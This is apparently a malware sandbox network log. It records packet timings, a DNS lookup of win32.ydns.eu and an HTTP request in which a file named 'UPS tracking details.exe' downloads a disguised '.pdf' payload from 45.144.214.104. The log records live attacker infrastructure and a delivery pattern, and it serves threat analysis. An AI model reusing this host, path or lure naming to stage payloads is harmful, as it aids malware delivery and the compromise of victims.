                                            Mar 3, 2025 08:45:54.925991058 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926033974 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926093102 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926143885 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926178932 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926196098 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926208019 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926218987 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926225901 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926229954 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926244020 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926291943 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926310062 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926321983 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926322937 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926331997 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926345110 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926351070 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926362038 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926373005 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926383972 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926398993 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926402092 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926413059 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926424026 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926434994 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926440954 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926454067 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926455975 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926465034 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926475048 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926475048 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926486015 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926497936 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926510096 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926517010 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926553011 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926584959 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926595926 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926614046 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926619053 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926641941 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926644087 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926652908 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926662922 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926677942 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926682949 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926712990 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.926951885 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926981926 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.926991940 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927027941 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927028894 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927040100 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927051067 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927069902 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927073002 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927087069 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927098036 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927107096 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927109957 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927126884 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927155018 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927195072 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927205086 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927222967 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927233934 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927236080 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927243948 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927263975 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927268982 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927275896 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927288055 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927298069 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927306890 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927309990 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927337885 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927341938 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927388906 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927433968 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927500963 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927517891 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927529097 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927539110 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927551031 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927561045 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927572966 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927586079 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927645922 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927655935 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927673101 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927685022 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927702904 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927707911 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927714109 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927723885 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927735090 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927735090 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927752018 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927755117 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927767038 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927778006 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927795887 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927807093 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927808046 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927818060 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927829027 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927839994 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927845001 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927851915 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.927870989 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.927906036 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.928105116 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.928116083 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.928127050 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.928138018 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.928149939 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.928160906 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.928162098 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.928173065 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.928198099 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969564915 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969604015 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969615936 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969628096 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969645977 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969664097 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969671965 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969679117 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969691992 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969702959 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969706059 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969717026 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969727039 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969727039 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969738960 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969767094 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969769001 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969779968 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969780922 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969809055 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969826937 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969851971 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969863892 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969885111 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969887972 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969901085 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969912052 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969932079 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969933033 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969944000 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969955921 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.969963074 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969983101 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.969989061 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970000029 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970010996 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970031023 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.970046043 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970057964 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970060110 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.970071077 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970087051 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.970093012 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970103979 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970110893 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.970139027 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.970169067 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.012856960 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.012888908 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.012900114 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.012916088 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.012928963 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.012942076 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.012955904 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.012957096 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.012968063 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013006926 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013024092 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013084888 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013098001 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013109922 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013134956 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013159990 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013204098 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013206959 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013248920 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013256073 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013268948 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013281107 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013314962 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013315916 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013328075 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013340950 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013353109 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013360977 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013375044 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013382912 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013386011 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013415098 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013453960 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013467073 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013478994 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013492107 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013493061 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013503075 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013518095 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013525009 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013539076 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013546944 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013550043 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013564110 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013585091 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013586044 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013597965 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013607979 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013612032 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013621092 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013642073 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013669968 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013895035 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013906956 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013920069 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013926029 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013937950 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013955116 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013955116 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013967037 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.013983965 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.013986111 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014002085 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014005899 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014019012 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014030933 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014034986 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014049053 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014051914 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014061928 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014072895 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014097929 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014121056 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014123917 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014143944 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014157057 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014168024 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014189005 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014192104 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014209032 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014219046 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014219999 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014240026 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014246941 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014251947 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014264107 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014271021 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014277935 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014302015 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014306068 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014316082 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014343023 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014348030 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014354944 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014386892 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014388084 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014400005 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014420986 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014421940 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014434099 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014444113 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014456034 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014486074 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014573097 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014585018 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014591932 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014615059 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014635086 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014636993 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014647961 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014655113 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014663935 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014677048 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014689922 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014691114 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014704943 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014713049 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014719009 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014731884 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014744043 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014750957 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014755011 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014775991 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014796972 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014803886 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014810085 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014821053 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014833927 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.014849901 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.014879942 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.056685925 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056698084 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056755066 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.056854963 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056871891 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056885004 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056895971 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056910992 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056915998 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.056922913 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056936026 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056947947 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056960106 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056966066 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.056972027 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056983948 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:55.056984901 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.057008982 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:55.099689960 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:46:00.075222015 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:46:00.075282097 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:46:00.763959885 CET6137853192.168.2.71.1.1.1
                                            Mar 3, 2025 08:46:00.769022942 CET53613781.1.1.1192.168.2.7
                                            Mar 3, 2025 08:46:00.769100904 CET6137853192.168.2.71.1.1.1
                                            Mar 3, 2025 08:46:00.774312019 CET53613781.1.1.1192.168.2.7
                                            Mar 3, 2025 08:46:01.413918018 CET6137853192.168.2.71.1.1.1
                                            Mar 3, 2025 08:46:01.419087887 CET53613781.1.1.1192.168.2.7
                                            Mar 3, 2025 08:46:01.419182062 CET6137853192.168.2.71.1.1.1
                                            Mar 3, 2025 08:46:08.084744930 CET4970580192.168.2.745.144.214.104
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 3, 2025 08:45:52.662981987 CET6489353192.168.2.71.1.1.1
                                            Mar 3, 2025 08:45:52.677602053 CET53648931.1.1.1192.168.2.7
                                            Mar 3, 2025 08:46:00.763405085 CET53567161.1.1.1192.168.2.7
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 3, 2025 08:45:52.662981987 CET192.168.2.71.1.1.10x1f02Standard query (0)win32.ydns.euA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 3, 2025 08:45:52.677602053 CET1.1.1.1192.168.2.70x1f02No error (0)win32.ydns.eu45.144.214.104A (IP address)IN (0x0001)false
                                            • win32.ydns.eu
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.74970545.144.214.104803164C:\Users\user\Desktop\UPS tracking details.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 3, 2025 08:45:52.701298952 CET105OUTGET /never/lookinto/it/panel/uploads/Fjuzaw.pdf HTTP/1.1
                                            Host: win32.ydns.eu
                                            Connection: Keep-Alive
                                            Mar 3, 2025 08:45:53.879551888 CET1236INHTTP/1.1 200 OK
                                            Date: Mon, 03 Mar 2025 07:45:53 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                            Last-Modified: Mon, 03 Mar 2025 03:22:59 GMT
                                            ETag: "fa608-62f67ac5438e3"
                                            Accept-Ranges: bytes
                                            Content-Length: 1025544
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/pdf
